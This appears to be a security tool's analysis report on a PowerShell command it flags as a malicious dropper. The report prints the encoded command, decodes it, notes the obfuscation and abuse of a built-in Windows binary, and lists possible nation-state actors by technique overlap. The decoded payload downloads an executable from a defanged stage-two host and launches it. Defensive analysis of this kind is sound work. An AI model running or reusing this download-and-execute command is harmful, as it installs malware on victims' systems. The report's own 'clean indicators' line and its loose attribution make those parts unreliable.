Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader.
powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBjAGQAbgAuAHMAdABhAGcAZQAyAC0AZAByAG8AcABbAC4AXQB4AHkAegAvAHMAdgBjAC4AZQB4AGUAIgAsACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB2AGMALgBlAHgAZQAiACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdgBjAC4AZQB4AGUAIgA=
Uses PowerShell to execute a base64-encoded PowerShell payload. The payload is obfuscated (1 decode layer); see the decoded content below.
The command leverages Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute. The payload uses base64-utf16le encoding — a common obfuscation technique to bypass signature-based detection and inline script-block logging.
1 network indicator were extracted (0 IPs, 1 URL) and returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
$c = New-Object Net.WebClient; $c.DownloadFile("http://cdn.stage2-drop[.]xyz/svc.exe","C:\ProgramData\svc.exe"); Start-Process "C:\ProgramData\svc.exe"All indicators appear clean across queried sources.
Powershell.exe is a a task-based command-line shell built on .NET.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.